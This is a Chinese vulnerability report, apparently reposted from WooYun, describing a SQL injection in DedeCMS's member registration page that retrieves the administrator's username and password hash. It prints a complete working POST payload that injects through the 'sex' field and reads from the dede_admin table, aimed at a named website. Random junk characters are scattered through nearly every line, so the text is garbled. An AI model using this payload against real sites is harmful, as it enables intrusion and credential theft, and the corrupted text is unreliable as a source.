漏洞类型: SQL注射漏洞
9 o% W# Q" T7 O! m& z2 O简要描述:
% z7 |/ j5 m G& U( M" M7 Z0 j
' E3 N% p, M- L R需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
6 t& c: G3 ~/ `( v8 u9 ~原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
; e4 N& c& V& \- E( s4 `1 V详细说明:跟这个漏洞
' x/ f& k2 T( P8 M 5 g4 O! z3 a( b( t! |( L B0 X
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
4 [% a: ~2 ]7 q1 T: @是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.! F- c" A, Y4 q6 ~6 ~
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
) W* F$ e1 r1 t. f- }- \8 d$ J: `
% A! k' O7 B! t* t0 Owww.political-security.com/member/reg_new.php5 m; E2 [( K3 O1 ~# h
0 \& B% i4 x( @ A4 XPOST/ K( o6 [/ C( L5 j
0 [% ~# I8 }+ c. K/ [dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
1 E8 U. h+ h, G$ P3 Y9 Iuserid=c4rp3nt3r&uname=c4rp3nt3r* |! p9 j C( c
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss Y2 N7 ~0 M. e& N, x; C( R. Z
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,5 L# s" a, M% N7 o& x* z$ E- h0 `6 |
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');# e. F! Q& r9 R! \, ]
%00&vdcode=glos&agree= |